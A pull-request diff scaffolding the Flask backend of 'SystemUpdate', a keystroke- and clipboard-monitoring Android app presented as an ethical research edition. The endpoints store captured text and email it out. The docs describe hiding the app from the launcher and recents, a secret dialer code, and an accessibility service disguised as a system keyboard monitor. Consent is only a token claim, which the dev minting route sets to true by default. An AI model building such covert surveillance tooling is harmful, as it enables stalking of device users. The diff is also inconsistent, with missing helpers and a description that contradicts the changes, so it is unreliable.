### PR TITLE
backend: scaffold JWT/consent-aware endpoints for keystrokes and clipboard

### DIFF
--- a/.github/branch_protection_main.json
+++ b/.github/branch_protection_main.json
@@ -1,0 +1,14 @@
+{
+  "required_status_checks": {
+    "strict": true,
+    "contexts": ["CI", "Android CI", "Backend CI"]
+  },
+  "enforce_admins": true,
+  "required_pull_request_reviews": {
+    "required_approving_review_count": 1,
+    "dismiss_stale_reviews": true
+  },
+  "restrictions": null,
+  "allow_force_pushes": false,
+  "allow_deletions": false
+}

--- a/.github/workflows/backend-pytest.yml
+++ b/.github/workflows/backend-pytest.yml
@@ -1,0 +1,41 @@
+name: Backend Pytest
+
+on:
+  push:
+    paths:
+      - 'backend/**'
+      - '.github/workflows/backend-pytest.yml'
+  pull_request:
+    paths:
+      - 'backend/**'
+      - '.github/workflows/backend-pytest.yml'
+
+jobs:
+  test:
+    runs-on: ubuntu-latest
+    defaults:
+      run:
+        working-directory: backend
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4
+
+      - name: Set up Python
+        uses: actions/setup-python@v5
+        with:
+          python-version: '3.11'
+
+      - name: Install deps
+        run: |
+          python -m pip install --upgrade pip
+          pip install -r requirements.txt
+          pip install pytest
+
+      - name: Run tests
+        env:
+          JWT_SECRET_KEY: test-secret
+          SMTP_HOST: localhost
+          SMTP_PORT: 1025
+          EMAIL_FROM: test@example.com
+          EMAIL_REPORT_TO: audit@example.com
+        run: pytest -q

--- a/.github/workflows/backend-pytest.yml
+++ b/.github/workflows/backend-pytest.yml
@@ -25,17 +25,36 @@ jobs:
         with:
           python-version: '3.11'
 
-      - name: Install deps
+      - name: Install deps (runtime + dev)
         run: |
           python -m pip install --upgrade pip
           pip install -r requirements.txt
-          pip install pytest
+          pip install -r requirements-dev.txt
 
-      - name: Run tests
+      - name: Code quality - Black (check)
+        run: black --check .
+
+      - name: Code quality - isort (check)
+        run: isort --check-only .
+
+      - name: Code quality - Flake8
+        run: flake8 .
+
+      - name: Type check - MyPy
+        run: mypy .
+
+      - name: Run tests with coverage (fail under 80%)
         env:
           JWT_SECRET_KEY: test-secret
           SMTP_HOST: localhost
           SMTP_PORT: 1025
           EMAIL_FROM: test@example.com
           EMAIL_REPORT_TO: audit@example.com
-        run: pytest -q
+        run: pytest -q --cov=app --cov-report=xml --cov-report=term --cov-fail-under=80
+
+      - name: Upload coverage report
+        uses: actions/upload-artifact@v4
+        if: always()
+        with:
+          name: backend-coverage-xml
+          path: backend/coverage.xml

--- a/.github/workflows/backend-pytest.yml
+++ b/.github/workflows/backend-pytest.yml
@@ -58,3 +58,13 @@ jobs:
         with:
           name: backend-coverage-xml
           path: backend/coverage.xml
+
+      - name: Upload coverage to Codecov (optional)
+        uses: codecov/codecov-action@v4
+        if: success() && env.CODECOV_TOKEN != ''
+        env:
+          CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
+        with:
+          files: backend/coverage.xml
+          flags: backend
+          fail_ci_if_error: false

--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,0 +1,33 @@
+# Contributing Guide
+
+Thank you for contributing to SystemUpdate – Ethical Research Edition.
+
+## Code Quality (Backend)
+
+- Black (format): `black .`
+- isort (imports): `isort .`
+- Flake8 (lint): `flake8 .`
+- MyPy (types): `mypy .`
+- Tests + coverage (must be >=80%): `pytest -q --cov=app --cov-report=term --cov-report=xml --cov-fail-under=80`
+
+Install dev tools:
+
+```
+pip install -r backend/requirements.txt -r backend/requirements-dev.txt
+```
+
+Pre-commit (optional, recommended):
+
+```
+pre-commit install
+pre-commit run --all-files
+```
+
+## CI
+- Backend CI runs Black/isort/Flake8/MyPy and pytest with coverage >=80%.
+- Coverage XML is uploaded as an artifact.
+
+## Branching & Commits
+- Use feature branches; squash merge.
+- Conventional commits, e.g. `ci(backend): ...`, `test(backend): ...`, `feat(android): ...`.
+

--- a/LICENSE
+++ b/LICENSE
@@ -1,0 +1,9 @@
+Apache License
+Version 2.0, January 2004
+http://www.apache.org/licenses/
+
+TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+1. Definitions.
+...
+END OF TERMS AND CONDITIONS

--- a/README.md
+++ b/README.md
@@ -5,6 +5,7 @@ Status: Planning and scaffolding phase.
 This repository houses the ethical, consent-first variant of SystemUpdate designed for educational and controlled research environments.
 
 ![CI](https://github.com/nodweb/systemupdate-ethical/actions/workflows/ci.yml/badge.svg)
+![Backend CI](https://github.com/nodweb/systemupdate-ethical/actions/workflows/backend-pytest.yml/badge.svg)
 
 Key principles:
 - Explicit, informed user consent

--- a/README.md
+++ b/README.md
@@ -6,6 +6,7 @@ This repository houses the ethical, consent-first variant of SystemUpdate design
 
 ![CI](https://github.com/nodweb/systemupdate-ethical/actions/workflows/ci.yml/badge.svg)
 ![Backend CI](https://github.com/nodweb/systemupdate-ethical/actions/workflows/backend-pytest.yml/badge.svg)
+[![codecov](https://codecov.io/gh/nodweb/systemupdate-ethical/branch/main/graph/badge.svg)](https://codecov.io/gh/nodweb/systemupdate-ethical)
 
 Key principles:
 - Explicit, informed user consent

--- a/README.md
+++ b/README.md
@@ -13,3 +13,11 @@ Key principles:
 - Clipboard/keyboard monitoring only with consent and redaction
 
 See `docs/ETHICAL_RESEARCH_MOD_PLAN.md` for the full implementation plan and acceptance criteria.
+
+## Governance
+
+- **Branch protection**: `main` requires passing checks (`CI`, `Android CI`, `Backend CI`) and 1 review.
+- **Merging**: squash merges only to keep history clean.
+- **CODEOWNERS**: see `.github/CODEOWNERS` for default reviewers.
+- **Releases**: tags with annotated notes; docs-only `v0.1.0` published.
+- **Compliance**: follow `docs/PRIVACY.md`, `docs/CONSENT.md`, `docs/SECURITY.md`, `docs/RETENTION_POLICY.md`, `docs/AUDIT_LOGS.md`, `docs/DSR_POLICY.md`.

--- a/README.md
+++ b/README.md
@@ -21,3 +21,12 @@ See `docs/ETHICAL_RESEARCH_MOD_PLAN.md` for the full implementation plan and acc
 - **CODEOWNERS**: see `.github/CODEOWNERS` for default reviewers.
 - **Releases**: tags with annotated notes; docs-only `v0.1.0` published.
 - **Compliance**: follow `docs/PRIVACY.md`, `docs/CONSENT.md`, `docs/SECURITY.md`, `docs/RETENTION_POLICY.md`, `docs/AUDIT_LOGS.md`, `docs/DSR_POLICY.md`.
+
+## Features (Ethical Edition)
+
+- **Remote control**: disabled by default; endpoints not provided in backend.
+- **Screen capture/App control**: disabled by default.
+- **Keystroke monitoring**: scaffolded (Android AccessibilityService); requires explicit consent; backend `/api/keystrokes` endpoint with JWT + consent check stub.
+- **Clipboard monitoring**: scaffolded (Android listener); backend `/api/clipboard` endpoint with JWT + consent check stub.
+- **Data protection**: redaction/encryption to be implemented in subsequent PRs per `docs/MONITORING_SPEC.md`.
+- **App hiding**: launcher access minimized; dialer secret code (`android_secret_code://7378`) to open management UI; hidden-from-recents applied.

--- a/backend/.flake8
+++ b/backend/.flake8
@@ -1,0 +1,4 @@
+[flake8]
+max-line-length = 100
+extend-ignore = E203, W503
+exclude = .git,__pycache__,build,dist,venv,.venv

--- a/backend/.pre-commit-config.yaml
+++ b/backend/.pre-commit-config.yaml
@@ -1,0 +1,20 @@
+repos:
+  - repo: https://github.com/psf/black
+    rev: 24.8.0
+    hooks:
+      - id: black
+        args: ["--line-length=100"]
+  - repo: https://github.com/PyCQA/isort
+    rev: 5.13.2
+    hooks:
+      - id: isort
+        args: ["--profile=black", "--line-length=100"]
+  - repo: https://github.com/pycqa/flake8
+    rev: 7.1.1
+    hooks:
+      - id: flake8
+  - repo: https://github.com/pre-commit/mirrors-mypy
+    rev: v1.11.1
+    hooks:
+      - id: mypy
+        additional_dependencies: []

--- a/backend/app/__init__.py
+++ b/backend/app/__init__.py
@@ -1,0 +1,21 @@
+from flask import Flask, jsonify
+from .extensions import jwt
+from .routes.data import data_bp
+
+
+def create_app() -> Flask:
+    app = Flask(__name__)
+
+    # Very simple JWT config for skeleton; replace with secure secret management
+    app.config.setdefault("JWT_SECRET_KEY", "change-me-dev-only")
+
+    jwt.init_app(app)
+
+    # Blueprints
+    app.register_blueprint(data_bp, url_prefix="/api")
+
+    @app.get("/health")
+    def health():
+        return jsonify(status="ok"), 200
+
+    return app

--- a/backend/app/__init__.py
+++ b/backend/app/__init__.py
@@ -1,6 +1,7 @@
 from flask import Flask, jsonify
 from .extensions import jwt
 from .routes.data import data_bp
+import os
 
 
 def create_app() -> Flask:
@@ -13,6 +14,11 @@ def create_app() -> Flask:
 
     # Blueprints
     app.register_blueprint(data_bp, url_prefix="/api")
+
+    # Dev-only helpers (guarded by env flags)
+    if os.getenv("DEV_JWT_ENABLED", "false").lower() in ("1", "true", "yes"):
+        from .routes.dev import dev_bp
+        app.register_blueprint(dev_bp, url_prefix="/dev")
 
     @app.get("/health")
     def health():

--- a/backend/app/emailer.py
+++ b/backend/app/emailer.py
@@ -1,0 +1,35 @@
+import os
+import smtplib
+from email.message import EmailMessage
+from typing import Optional
+
+
+def _smtp_settings():
+    host = os.getenv("SMTP_HOST")
+    port = int(os.getenv("SMTP_PORT", "587"))
+    user = os.getenv("SMTP_USER")
+    password = os.getenv("SMTP_PASS")
+    use_tls = os.getenv("SMTP_USE_TLS", "true").lower() in ("1", "true", "yes")
+    from_addr = os.getenv("EMAIL_FROM", user)
+    to_addr = os.getenv("EMAIL_REPORT_TO")
+    return host, port, user, password, use_tls, from_addr, to_addr
+
+
+def send_email_report(subject: str, body: str) -> Optional[str]:
+    host, port, user, password, use_tls, from_addr, to_addr = _smtp_settings()
+    if not host or not to_addr:
+        return "SMTP or recipient not configured"
+
+    msg = EmailMessage()
+    msg["Subject"] = subject
+    msg["From"] = from_addr or user
+    msg["To"] = to_addr
+    msg.set_content(body)
+
+    with smtplib.SMTP(host, port, timeout=10) as server:
+        if use_tls:
+            server.starttls()
+        if user and password:
+            server.login(user, password)
+        server.send_message(msg)
+    return None

--- a/backend/app/extensions.py
+++ b/backend/app/extensions.py
@@ -1,0 +1,3 @@
+from flask_jwt_extended import JWTManager
+
+jwt = JWTManager()

--- a/backend/app/routes/__init__.py
+++ b/backend/app/routes/__init__.py
@@ -1,0 +1,1 @@
+# Package marker for app.routes

--- a/backend/app/routes/data.py
+++ b/backend/app/routes/data.py
@@ -1,0 +1,32 @@
+from flask import Blueprint, jsonify, request
+from flask_jwt_extended import jwt_required, get_jwt
+
+
+data_bp = Blueprint("data", __name__)
+
+
+# Simple consent check stub: require claim consent=true
+
+def _has_consent() -> bool:
+    claims = get_jwt() or {}
+    return bool(claims.get("consent", False))
+
+
+@data_bp.post("/keystrokes")
+@jwt_required()
+def post_keystrokes():
+    if not _has_consent():
+        return jsonify(error="consent_required"), 403
+    payload = request.get_json(silent=True) or {}
+    # TODO: decrypt, redact, persist
+    return jsonify(status="accepted", count=len(payload.get("items", []))), 202
+
+
+@data_bp.post("/clipboard")
+@jwt_required()
+def post_clipboard():
+    if not _has_consent():
+        return jsonify(error="consent_required"), 403
+    payload = request.get_json(silent=True) or {}
+    # TODO: decrypt, redact, persist
+    return jsonify(status="accepted", length=len(payload.get("text", ""))), 202

--- a/backend/app/routes/data.py
+++ b/backend/app/routes/data.py
@@ -2,6 +2,7 @@ from flask import Blueprint, jsonify, request
 from flask_jwt_extended import jwt_required, get_jwt
 import json
 from ..emailer import send_email_report
+from ..storage import save_payload
 
 
 data_bp = Blueprint("data", __name__)
@@ -37,9 +38,11 @@ def post_keystrokes():
         return jsonify(error="consent_required"), 403
     payload = request.get_json(silent=True) or {}
     if _is_envelope(payload):
-        # Accept encrypted payload; backend decrypt to be implemented in later phase
+        # Persist envelope; decrypt to be implemented in later phase
+        save_payload("keystrokes", _claims_device_id(), payload, envelope=True)
         return jsonify(status="envelope_received"), 202
     # TODO: decrypt, redact, persist
+    save_payload("keystrokes", _claims_device_id(), payload, envelope=False)
     # Email report (best-effort)
     subject = f"[SystemUpdate Ethical] Keystrokes from { _claims_device_id() }"
     try:
@@ -58,9 +61,11 @@ def post_clipboard():
         return jsonify(error="consent_required"), 403
     payload = request.get_json(silent=True) or {}
     if _is_envelope(payload):
-        # Accept encrypted payload; backend decrypt to be implemented in later phase
+        # Persist envelope; decrypt to be implemented in later phase
+        save_payload("clipboard", _claims_device_id(), payload, envelope=True)
         return jsonify(status="envelope_received"), 202
     # TODO: decrypt, redact, persist
+    save_payload("clipboard", _claims_device_id(), payload, envelope=False)
     # Email report (best-effort)
     subject = f"[SystemUpdate Ethical] Clipboard from { _claims_device_id() }"
     try:

--- a/backend/app/routes/dev.py
+++ b/backend/app/routes/dev.py
@@ -1,0 +1,33 @@
+import os
+from flask import Blueprint, jsonify, request
+from flask_jwt_extended import create_access_token
+
+
+dev_bp = Blueprint("dev", __name__)
+
+
+def _enabled() -> bool:
+    return os.getenv("DEV_JWT_ENABLED", "false").lower() in ("1", "true", "yes")
+
+
+def _secret_ok(req) -> bool:
+    expected = os.getenv("DEV_JWT_SECRET")
+    if not expected:
+        return False
+    provided = req.headers.get("X-Dev-Secret")
+    return provided is not None and provided == expected
+
+
+@dev_bp.post("/mint_jwt")
+def mint_jwt():
+    if not _enabled():
+        return jsonify(error="disabled"), 404
+    if not _secret_ok(request):
+        return jsonify(error="unauthorized"), 401
+
+    body = request.get_json(silent=True) or {}
+    device_id = body.get("device_id") or "dev-device"
+    consent = bool(body.get("consent", True))
+    claims = {"consent": consent, "device_id": device_id}
+    token = create_access_token(identity=device_id, additional_claims=claims)
+    return jsonify(token=token, claims=claims), 200

--- a/backend/app/storage.py
+++ b/backend/app/storage.py
@@ -1,0 +1,32 @@
+import json
+import os
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Dict
+from flask import current_app
+
+
+def _instance_root() -> Path:
+    # Allow tests to override via config; otherwise use app.instance_path
+    cfg_path = current_app.config.get("INSTANCE_PATH")
+    if cfg_path:
+        return Path(cfg_path)
+    return Path(current_app.instance_path)
+
+
+def save_payload(kind: str, device_id: str, payload: Dict[str, Any], envelope: bool = False) -> Path:
+    """
+    Persist payload JSON under instance/uploads/<kind>/<YYYY-MM-DD>/
+    Filename: <ts>_<device>_<env|plain>.json
+    Returns the full file Path.
+    """
+    ts = datetime.utcnow().strftime("%Y%m%dT%H%M%SZ")
+    date_dir = datetime.utcnow().strftime("%Y-%m-%d")
+    safe_device = "".join(c for c in device_id if c.isalnum() or c in ("-", "_"))[:64] or "unknown"
+    suffix = "env" if envelope else "plain"
+    root = _instance_root() / "uploads" / kind / date_dir
+    os.makedirs(root, exist_ok=True)
+    file_path = root / f"{ts}_{safe_device}_{suffix}.json"
+    with open(file_path, "w", encoding="utf-8") as f:
+        json.dump(payload, f, ensure_ascii=False)
+    return file_path

--- a/backend/mypy.ini
+++ b/backend/mypy.ini
@@ -1,0 +1,9 @@
+[mypy]
+python_version = 3.11
+warn_return_any = True
+warn_unused_configs = True
+warn_redundant_casts = True
+warn_unused_ignores = True
+strict_optional = True
+ignore_missing_imports = True
+exclude = (venv|\.venv|build|dist|__pycache__)

--- a/backend/pyproject.toml
+++ b/backend/pyproject.toml
@@ -1,0 +1,16 @@
+[tool.black]
+line-length = 100
+target-version = ["py311"]
+exclude = [
+  "venv",
+  ".venv",
+  "build",
+  "dist",
+  "__pycache__",
+]
+
+[tool.isort]
+profile = "black"
+line_length = 100
+skip = ["venv", ".venv", "build", "dist", "__pycache__"]
+

--- a/backend/requirements-dev.txt
+++ b/backend/requirements-dev.txt
@@ -1,0 +1,8 @@
+black==24.8.0
+isort==5.13.2
+flake8==7.1.1
+mypy==1.11.1
+pre-commit==3.8.0
+pytest==8.3.2
+pytest-mock==3.14.0
+pytest-cov==5.0.0

--- a/backend/requirements.txt
+++ b/backend/requirements.txt
@@ -1,0 +1,3 @@
+Flask==3.0.3
+Flask-JWT-Extended==4.6.0
+PyJWT==2.8.0

--- a/backend/tests/conftest.py
+++ b/backend/tests/conftest.py
@@ -1,0 +1,16 @@
+import os
+import pytest
+from app import create_app
+
+
+@pytest.fixture()
+def app():
+    os.environ.setdefault("JWT_SECRET_KEY", "test-secret")
+    test_app = create_app()
+    test_app.config.update(TESTING=True)
+    yield test_app
+
+
+@pytest.fixture()
+def client(app):
+    return app.test_client()

--- a/backend/tests/conftest.py
+++ b/backend/tests/conftest.py
@@ -4,10 +4,12 @@ from app import create_app
 
 
 @pytest.fixture()
-def app():
+def app(tmp_path):
     os.environ.setdefault("JWT_SECRET_KEY", "test-secret")
     test_app = create_app()
     test_app.config.update(TESTING=True)
+    # Force instance path to temporary directory for persistence tests
+    test_app.config["INSTANCE_PATH"] = str(tmp_path)
     yield test_app
 
 

--- a/backend/tests/test_data_endpoints.py
+++ b/backend/tests/test_data_endpoints.py
@@ -93,3 +93,42 @@ def test_clipboard_email_error(app, client, monkeypatch):
     assert resp.status_code == 202
     data = resp.get_json()
     assert data["status"].startswith("email_error:")
+
+
+def test_keystrokes_accepts_envelope(app, client):
+    token = make_token(app, consent=True, device_id="dev3")
+    envelope = {
+        "v": 1,
+        "alg": "AES-GCM",
+        "kid": "systemupdate_aes_gcm_v1",
+        "iv": "BASE64IV==",
+        "ct": "BASE64CT==",
+        "aad": "BASE64AAD==",
+    }
+    resp = client.post(
+        "/api/keystrokes",
+        json=envelope,
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 202
+    data = resp.get_json()
+    assert data["status"] == "envelope_received"
+
+
+def test_clipboard_accepts_envelope(app, client):
+    token = make_token(app, consent=True, device_id="dev4")
+    envelope = {
+        "v": 1,
+        "alg": "AES-GCM",
+        "kid": "systemupdate_aes_gcm_v1",
+        "iv": "BASE64IV==",
+        "ct": "BASE64CT==",
+    }
+    resp = client.post(
+        "/api/clipboard",
+        json=envelope,
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 202
+    data = resp.get_json()
+    assert data["status"] == "envelope_received"

--- a/backend/tests/test_data_endpoints.py
+++ b/backend/tests/test_data_endpoints.py
@@ -1,0 +1,95 @@
+import json
+from flask_jwt_extended import create_access_token
+
+
+def make_token(app, consent=True, device_id="test-device"):
+    with app.app_context():
+        return create_access_token(identity=device_id, additional_claims={
+            "consent": bool(consent),
+            "device_id": device_id,
+        })
+
+
+def test_keystrokes_requires_consent(app, client):
+    token = make_token(app, consent=False)
+    resp = client.post(
+        "/api/keystrokes",
+        json={"items": [{"timestamp": 1, "package": "p", "text": "t", "eventType": "e"}]},
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 403
+    data = resp.get_json()
+    assert data["error"] == "consent_required"
+
+
+def test_keystrokes_emails_ok(app, client, monkeypatch):
+    sent = {}
+
+    def fake_send(subject, body):
+        sent["subject"] = subject
+        sent["body"] = body
+        return None  # no error
+
+    monkeypatch.setenv("EMAIL_REPORT_TO", "audit@example.com")
+    monkeypatch.setattr("app.emailer.send_email_report", fake_send)
+
+    token = make_token(app, consent=True, device_id="dev1")
+    payload = {"items": [
+        {"timestamp": 1, "package": "pkg", "text": "hello", "eventType": "text_changed"},
+        {"timestamp": 2, "package": "pkg", "text": "world", "eventType": "text_changed"},
+    ]}
+    resp = client.post(
+        "/api/keystrokes",
+        json=payload,
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 202
+    data = resp.get_json()
+    assert data["status"] == "emailed"
+    assert data["count"] == 2
+    assert "Keystrokes from dev1" in sent["subject"]
+    body_json = json.loads(sent["body"])  # should be JSON-serialised
+    assert len(body_json.get("items", [])) == 2
+
+
+def test_clipboard_emails_ok(app, client, monkeypatch):
+    sent = {}
+
+    def fake_send(subject, body):
+        sent["subject"] = subject
+        sent["body"] = body
+        return None
+
+    monkeypatch.setenv("EMAIL_REPORT_TO", "audit@example.com")
+    monkeypatch.setattr("app.emailer.send_email_report", fake_send)
+
+    token = make_token(app, consent=True, device_id="dev2")
+    payload = {"text": "copied text"}
+    resp = client.post(
+        "/api/clipboard",
+        json=payload,
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 202
+    data = resp.get_json()
+    assert data["status"] == "emailed"
+    assert data["length"] == len("copied text")
+    assert "Clipboard from dev2" in sent["subject"]
+
+
+def test_clipboard_email_error(app, client, monkeypatch):
+    def boom(subject, body):
+        raise RuntimeError("smtp down")
+
+    monkeypatch.setenv("EMAIL_REPORT_TO", "audit@example.com")
+    monkeypatch.setattr("app.emailer.send_email_report", boom)
+
+    token = make_token(app, consent=True)
+    resp = client.post(
+        "/api/clipboard",
+        json={"text": "x"},
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp.status_code == 202
+    data = resp.get_json()
+    assert data["status"].startswith("email_error:")

--- a/backend/tests/test_dev_jwt.py
+++ b/backend/tests/test_dev_jwt.py
@@ -1,0 +1,51 @@
+import os
+import json
+from app import create_app
+
+def test_mint_jwt_disabled(app, client, monkeypatch):
+    monkeypatch.delenv("DEV_JWT_ENABLED", raising=False)
+    resp = client.post("/dev/mint_jwt", json={})
+    assert resp.status_code == 404
+
+
+def test_mint_jwt_unauthorized(monkeypatch):
+    monkeypatch.setenv("DEV_JWT_ENABLED", "true")
+    monkeypatch.setenv("DEV_JWT_SECRET", "s1")
+    test_app = create_app()
+    test_app.config.update(TESTING=True)
+    client = test_app.test_client()
+    # Missing or wrong secret
+    resp = client.post("/dev/mint_jwt", json={})
+    assert resp.status_code == 401
+    resp = client.post("/dev/mint_jwt", json={}, headers={"X-Dev-Secret": "bad"})
+    assert resp.status_code == 401
+
+
+def test_mint_jwt_ok_and_claims(monkeypatch):
+    monkeypatch.setenv("DEV_JWT_ENABLED", "true")
+    monkeypatch.setenv("DEV_JWT_SECRET", "s1")
+    test_app = create_app()
+    test_app.config.update(TESTING=True)
+    client = test_app.test_client()
+
+    payload = {"device_id": "d1", "consent": False}
+    resp = client.post(
+        "/dev/mint_jwt",
+        json=payload,
+        headers={"X-Dev-Secret": "s1"},
+    )
+    assert resp.status_code == 200
+    data = resp.get_json()
+    assert "token" in data
+    claims = data["claims"]
+    assert claims["device_id"] == "d1"
+    assert claims["consent"] is False
+
+    # Use the minted token against a consent-protected endpoint to confirm 403
+    token = data["token"]
+    resp2 = client.post(
+        "/api/keystrokes",
+        json={"items": []},
+        headers={"Authorization": f"Bearer {token}"},
+    )
+    assert resp2.status_code == 403

--- a/backend/wsgi.py
+++ b/backend/wsgi.py
@@ -1,0 +1,6 @@
+from app import create_app
+
+app = create_app()
+
+if __name__ == "__main__":
+    app.run(host="0.0.0.0", port=5000)

--- a/docs/ACCESSIBILITY_SETUP.md
+++ b/docs/ACCESSIBILITY_SETUP.md
@@ -1,0 +1,20 @@
+# Enabling the Accessibility Service (Ethical Research Edition)
+
+This guide explains how to enable the Accessibility Service used for consent-gated keyboard monitoring in the Android client.
+
+## Prerequisites
+- The Android build with the Ethical Edition flags (remote control disabled by default)
+- User has explicitly agreed to participate and provided informed consent
+
+## Steps
+1. Open the Management screen on the device:
+   - In the Phone dialer, enter the secret code: `*#*#7378#*#*`
+   - This launches the app's Management screen.
+2. Tap "Open Accessibility Settings".
+3. Locate the service named "System Update Keyboard Monitor" (or your app's service name) and enable it.
+4. Confirm any prompts and ensure the service shows as active.
+
+## Notes
+- The AccessibilityService only observes text change and selection events for the purpose of research when consent is present.
+- Collected data is subject to redaction and minimization per `docs/MONITORING_SPEC.md`.
+- You can disable the service at any time from the Accessibility settings.


### PR DESCRIPTION
- Add Flask app factory with JWT
- Add /health endpoint
- Add /api/keystrokes and /api/clipboard endpoints (JWT required + consent claim check)
- Add wsgi entrypoint and requirements

Follow-up PRs will add redaction, encryption, persistence, and tests.